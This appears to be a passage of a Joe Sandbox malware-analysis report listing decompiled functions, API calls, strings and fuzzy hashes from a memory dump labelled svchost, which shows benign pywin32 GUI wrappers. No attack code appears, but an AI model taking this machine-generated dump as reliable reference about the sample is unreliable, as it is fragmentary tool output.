                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParsePlacementRestoreSaveTupleWin_Window
                            • String ID: ,$O(ii(ii)(ii)(iiii)):SetWindowPlacement$SetWindowPlacement
                            • API String ID: 2077839949-1347706296
                            • Opcode ID: 119fa4725a87d9974438a88d135a833e66b7b9442e7c16bcdd7a63534dad7fe9
                            • Instruction ID: 2b218cb36e08fa3a9c0417f227715b702d4456e2bceaf0381fd3ea334fd0882b
                            • Opcode Fuzzy Hash: 119fa4725a87d9974438a88d135a833e66b7b9442e7c16bcdd7a63534dad7fe9
                            • Instruction Fuzzy Hash: 831121B2418345AFD701DB54CD84EAB77FCBF84201F884A2AF956C2121E730D61A8BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7D30, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOii:CreateCaret,?,?,?), ref: 6DAB7D5F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7D80
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7D92
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: CreateCaret$OOii:CreateCaret
                            • API String ID: 1248562531-3503100133
                            • Opcode ID: 61502564333a968dd07ba0024484b775123717705d33f5fb5f065f6bfcf589d4
                            • Instruction ID: bd833359877ddb09eae2f2160d6ecaab87173ff765817ea48842c8d6f4f32cbc
                            • Opcode Fuzzy Hash: 61502564333a968dd07ba0024484b775123717705d33f5fb5f065f6bfcf589d4
                            • Instruction Fuzzy Hash: 1411847680C305AFDB01AF18CC41BAB7BFCBF85255F884969F88581131E331D96A9BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE8C0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:DrawIcon,?,?,?), ref: 6DAAE8EF
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE910
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE922
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DrawIcon$OiiO:DrawIcon
                            • API String ID: 1248562531-1311418177
                            • Opcode ID: 6d2d42dca3b3b1fb8123bef5bb2bc4992734e2c172c48772fff20745bf5a2aee
                            • Instruction ID: e511bfe0ae7473cdc47ed4e5480d46bd36f53c36cbbc94007aa5a155d28d0b1f
                            • Opcode Fuzzy Hash: 6d2d42dca3b3b1fb8123bef5bb2bc4992734e2c172c48772fff20745bf5a2aee
                            • Instruction Fuzzy Hash: 2911847640C305AFDB01AF18CC40BAB7BF8BF84215F884A59F885C2121E335D95A9BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF8C0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:ImageList_Replace,?,?,?), ref: 6DAAF8F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF918
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF92A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF93C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiOO:ImageList_Replace
                            • API String ID: 1248562531-806732491
                            • Opcode ID: 04d6ba1401edb94b502e98afea9f369e41ff69237a4634780be1285e622881c9
                            • Instruction ID: f9f7ff5573d00dafc6cde4de6f155f1130e990bdd07cf986304074fa5ee86d07
                            • Opcode Fuzzy Hash: 04d6ba1401edb94b502e98afea9f369e41ff69237a4634780be1285e622881c9
                            • Instruction Fuzzy Hash: 3C117F7540C306AFDB00DF54CC44BAB7BF9AF84215F448A29F894C2120E731D95A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF100, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO:ImageList_Add,00000000,?), ref: 6DAAF132
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF153
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF165
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF177
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOO:ImageList_Add
                            • API String ID: 1248562531-1709006905
                            • Opcode ID: a801733eb6f826de605fb7b5c02d07e36bd963311d48314564b2ee615b632629
                            • Instruction ID: b0cd972b1f9edf20a184ecc2448f1ca3e9f9cc798381c4243ce2d1ff40b5b471
                            • Opcode Fuzzy Hash: a801733eb6f826de605fb7b5c02d07e36bd963311d48314564b2ee615b632629
                            • Instruction Fuzzy Hash: 66115E7540C306AFDB00EF24CD44BABBBF9BF85245F484929F984C2121E731D95A8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB60B0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:InvalidateRgn,00000000,?), ref: 6DAB60DA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB60FB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB610D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: InvalidateRgn$OOi:InvalidateRgn
                            • API String ID: 1248562531-3879687307
                            • Opcode ID: aefc6ea852a811e9ca986e6b4c4025831e7347e2e5f8589eb6745367be1ac546
                            • Instruction ID: 728e68aabca6dfe44bbbbc24247330f3bf7e295af1a4e56f0ec67d17c5417fd1
                            • Opcode Fuzzy Hash: aefc6ea852a811e9ca986e6b4c4025831e7347e2e5f8589eb6745367be1ac546
                            • Instruction Fuzzy Hash: AC119375808302AFDB009F18DC41BAB7BB9BF44251F488569FC8582231E335D56A9AA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAA500, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 62COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,AngleArc), ref: 6DAAA51D
                            • PyArg_ParseTuple.PYTHON38(?,Oiikff:AngleArc,?,?,?,?,?,?), ref: 6DAAA551
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$AngleArc$AngleArc$Oiikff:AngleArc
                            • API String ID: 361908667-3156187010
                            • Opcode ID: db81c88ac2a5f5cf76866289b60d7aa63953bb943dcc2de4c70bfce0dc5895f0
                            • Instruction ID: 001dac141d17b5a2ef7fc78370f8683fbafdf742882b593d62775ea5ad1200a2
                            • Opcode Fuzzy Hash: db81c88ac2a5f5cf76866289b60d7aa63953bb943dcc2de4c70bfce0dc5895f0
                            • Instruction Fuzzy Hash: AE21637580C302AFCB01DF59CD80E6A77F9BF85200F488659F94592131E731DA6A9B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE5D0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetMenu,?), ref: 6DAAE5F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE616
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE628
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:SetMenu$SetMenu
                            • API String ID: 1248562531-1696462938
                            • Opcode ID: 681ba75e481a1fb2c80fb8c9b9e7fc15cda688ee3e33c7dc1e82aff9ee048a96
                            • Instruction ID: 4b88b726e6f3e3dcb7d0052233532488fea1acfac7653625dcde89974cb0bfd4
                            • Opcode Fuzzy Hash: 681ba75e481a1fb2c80fb8c9b9e7fc15cda688ee3e33c7dc1e82aff9ee048a96
                            • Instruction Fuzzy Hash: 7111A77590C211AFEB00AF18CC45B7B77F8FF40315F888965FC54C2121F33199269A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB4D40, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:PaintRgn,?), ref: 6DAB4D65
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4D86
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4D98
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:PaintRgn$PaintRgn
                            • API String ID: 1248562531-1047367956
                            • Opcode ID: 1c2a105ab7db658861e9790fed10eb710ef7a672c2010844896d514658483a43
                            • Instruction ID: a38f8305e3a7d3c17e02a1ec641aac7706286ec03513d0f9319bb278246cf607
                            • Opcode Fuzzy Hash: 1c2a105ab7db658861e9790fed10eb710ef7a672c2010844896d514658483a43
                            • Instruction Fuzzy Hash: 0511A73680C311AFDB00DB28CC45B7A77F8FF45215F888955FC5482121F37199279A92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6D00, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?), ref: 6DAA6D26
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid null-terminated string), ref: 6DAA6D46
                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 6DAA6D60
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?), ref: 6DAA6D79
                            • IsBadStringPtrW.KERNEL32 ref: 6DAA6D89
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z.PYWINTYPES38 ref: 6DAA6D9D
                            Strings
                            • The value is not a valid address for reading, xrefs: 6DAA6D6A
                            • The value is not a valid null-terminated string, xrefs: 6DAA6D93
                            • PyGetString: NULL is not valid pointer, xrefs: 6DAA6D3A
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_StringU_object@@$Arg_Err_ParseReadTuple
                            • String ID: PyGetString: NULL is not valid pointer$The value is not a valid address for reading$The value is not a valid null-terminated string
                            • API String ID: 554723670-4174888862
                            • Opcode ID: 2c5400517a2ce0e739d9f905900b7fddc74697c97ab94ad88bb4d19f2e3330a7
                            • Instruction ID: 64946703eeadd4a8b07cba6ec2769fbecaf32491599fab26f6d211b19b0b3feb
                            • Opcode Fuzzy Hash: 2c5400517a2ce0e739d9f905900b7fddc74697c97ab94ad88bb4d19f2e3330a7
                            • Instruction Fuzzy Hash: 5E11827540CB01AFDF006B28DD48A2A37B9BF41751F4C8728F465D22B0E731C9A6DA53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB2D40, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetOpenFileName), ref: 6DAB2D55
                            • PyErr_Format.PYTHON38(6E28ED8C,Argument must be a %d-byte string (got string of %d bytes),00000058,?), ref: 6DAB2D98
                            Strings
                            • O:GetOpenFileName, xrefs: 6DAB2D4C
                            • Argument must be a %d-byte string (got type %s), xrefs: 6DAB2D7A
                            • Argument must be a %d-byte string (got string of %d bytes), xrefs: 6DAB2D8C
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: Argument must be a %d-byte string (got string of %d bytes)$Argument must be a %d-byte string (got type %s)$O:GetOpenFileName
                            • API String ID: 361908667-770682294
                            • Opcode ID: 7ab5560a388eff3e13104c9da5976e77156012e202b8f11c2469aa833046183e
                            • Instruction ID: b2cfdb9ebe9725c2e5a006345878f022ccd1c6abfc9a07fe6722acea1081636a
                            • Opcode Fuzzy Hash: 7ab5560a388eff3e13104c9da5976e77156012e202b8f11c2469aa833046183e
                            • Instruction Fuzzy Hash: FA01D232509200AFCF205F58CC48F6677B9FF42312F04856AF942D2162D73098979B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA99B0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47COMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAA99B0(intOrPtr _a8) {
				struct _XFORM _v24;
				struct HDC__* _v28;
				char _v32;
				void* _t7;
				struct HDC__** _t8;
				int _t11;
				intOrPtr* _t14;

				if( *0x6dac7c94 != 0) {
					_t7 =  &_v32;
					__imp__PyArg_ParseTuple(_a8, "O:GetWorldTransform", _t7);
					if(_t7 != 0) {
						_t8 =  &_v28;
						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v32, _t8);
						if(_t8 == 0) {
							goto L3;
						} else {
							_t11 = GetWorldTransform(_v28,  &_v24);
							if(_t11 != 0) {
								return E6DAA9920( &_v32);
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetWorldTransform", _t11);
								return _t11;
							}
						}
					} else {
						L3:
						return 0;
					}
				} else {
					_t14 = __imp__PyExc_NotImplementedError;
					__imp__PyErr_Format( *_t14, "%s is not available on this platform", "GetWorldTransform");
					return _t14;
				}
			}










                            0x6daa99ba
                            0x6daa99da
                            0x6daa99e7
                            0x6daa99f2
                            0x6daa99fa
                            0x6daa9a03
                            0x6daa9a0e
                            0x00000000
                            0x6daa9a10
                            0x6daa9a19
                            0x6daa9a21
                            0x6daa9a46
                            0x6daa9a23
                            0x6daa9a29
                            0x6daa9a35
                            0x6daa9a35
                            0x6daa9a21
                            0x6daa99f4
                            0x6daa99f4
                            0x6daa99f9
                            0x6daa99f9
                            0x6daa99bc
                            0x6daa99bc
                            0x6daa99cd
                            0x6daa99d9
                            0x6daa99d9

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GetWorldTransform), ref: 6DAA99CD
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWorldTransform), ref: 6DAA99E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$GetWorldTransform$GetWorldTransform$O:GetWorldTransform
                            • API String ID: 361908667-1009900836
                            • Opcode ID: 2457bad8c7619bdab1ad003c450e88eb97dd06d1893b13fb67f5b8e29a4516dd
                            • Instruction ID: 675ab47a36d1863c29e4367c503ce287be4d15d7d6dd93f3ecbe115fc404b7e5
                            • Opcode Fuzzy Hash: 2457bad8c7619bdab1ad003c450e88eb97dd06d1893b13fb67f5b8e29a4516dd
                            • Instruction Fuzzy Hash: AF0175B580C201BFEF105B55CD85AB67BB8BB85204F8C4624F859C1132F736D6AAC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91890, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO:MsgWaitForMultipleObjectsEx,?,?,?,?,?), ref: 6DA918CF
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA918F4
                            • PyErr_Occurred.PYTHON38 ref: 6DA91906
                            Strings
                            • OOOO:MsgWaitForMultipleObjectsEx, xrefs: 6DA918C6
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OOOO:MsgWaitForMultipleObjectsEx
                            • API String ID: 3166690688-2955484690
                            • Opcode ID: 3a856cfe8e80878f8484a5789caabe6eee1320886e8d9cd9eb38217bd3064f36
                            • Instruction ID: f5906d4627818495fe60bc96865b0e70b81e17e73a5db512ae6bc73d28f85ebc
                            • Opcode Fuzzy Hash: 3a856cfe8e80878f8484a5789caabe6eee1320886e8d9cd9eb38217bd3064f36
                            • Instruction Fuzzy Hash: 4821267951C3065BD700AE38DC40BABBBECEB81374F55463AEC64C2290E73AD55989A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6DB0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 69COMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAA6DB0(intOrPtr _a8) {
				char _v4;
				wchar_t* _v8;
				void* _v12;
				int _v16;
				wchar_t** _t15;
				wchar_t** _t17;
				intOrPtr _t24;
				int _t26;
				intOrPtr* _t27;
				void* _t30;

				_v12 = 0;
				_v16 = 0;
				_t15 =  &_v12;
				__imp__PyArg_ParseTuple(_a8,  *0x6dac79f4, _t15,  &_v4,  &_v16);
				if(_t15 == 0) {
					L3:
					return 0;
				} else {
					_t17 =  &_v8;
					__imp__?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z(_v4, _t17, 0, 0);
					if(_t17 != 0) {
						_t26 = _v16;
						if(_t26 == 0) {
							_t27 = _v8;
							_t30 = _t27 + 2;
							do {
								_t24 =  *_t27;
								_t27 = _t27 + 2;
							} while (_t24 != 0);
							_t26 = (_t27 - _t30 >> 1) + 1;
							_v16 = _t26;
						}
						if(IsBadWritePtr(_v12, _t26) == 0) {
							wcsncpy(_v12, _v8, _v16);
							 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
							return __imp___Py_NoneStruct;
						} else {
							__imp__PyErr_SetString( *__imp__PyExc_ValueError, "The value is not a valid address for writing");
							return 0;
						}
					} else {
						__imp__PyErr_SetString( *__imp__PyExc_TypeError, "String must by string type");
						goto L3;
					}
				}
			}













                            0x6daa6db6
                            0x6daa6dc3
                            0x6daa6dcc
                            0x6daa6ddb
                            0x6daa6de6
                            0x6daa6e17
                            0x6daa6e1c
                            0x6daa6de8
                            0x6daa6dec
                            0x6daa6df5
                            0x6daa6e00
                            0x6daa6e1d
                            0x6daa6e22
                            0x6daa6e24
                            0x6daa6e28
                            0x6daa6e30
                            0x6daa6e30
                            0x6daa6e33
                            0x6daa6e36
                            0x6daa6e3f
                            0x6daa6e40
                            0x6daa6e40
                            0x6daa6e50
                            0x6daa6e78
                            0x6daa6e86
                            0x6daa6e90
                            0x6daa6e52
                            0x6daa6e5e
                            0x6daa6e6c
                            0x6daa6e6c
                            0x6daa6e02
                            0x6daa6e0e
                            0x00000000
                            0x6daa6e14
                            0x6daa6e00

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?,?), ref: 6DAA6DDB
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DAA6DF5
                            • PyErr_SetString.PYTHON38(6E28ED8C,String must by string type), ref: 6DAA6E0E
                            • IsBadWritePtr.KERNEL32(?), ref: 6DAA6E48
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid address for writing), ref: 6DAA6E5E
                            • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6DAA6E78
                            Strings
                            • The value is not a valid address for writing, xrefs: 6DAA6E57
                            • String must by string type, xrefs: 6DAA6E07
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_String$Arg_Object_ParseTupleU_object@@Writewcsncpy
                            • String ID: String must by string type$The value is not a valid address for writing
                            • API String ID: 3068015728-1634853043
                            • Opcode ID: c585621ed5b1326dc40deb4b3efedb5a7311ee9e57cbac758971c74adde3cd73
                            • Instruction ID: 36f3a53a7bec576217ec76dfc156ace1d282b38a6d7348a6bc09da973bae2751
                            • Opcode Fuzzy Hash: c585621ed5b1326dc40deb4b3efedb5a7311ee9e57cbac758971c74adde3cd73
                            • Instruction Fuzzy Hash: E3213A7450C201AFDB009F28CC85B7A7BB5FF45305F488A58F99582232E7329966DF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB4160, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiiiiiiii:Chord,?,?,?,?,?,?,?,?,?), ref: 6DAB41A0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB41BC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB41CB
                            • Chord.GDI32(?,?,?,?,?,?,?,?,?), ref: 6DAB41F7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4200
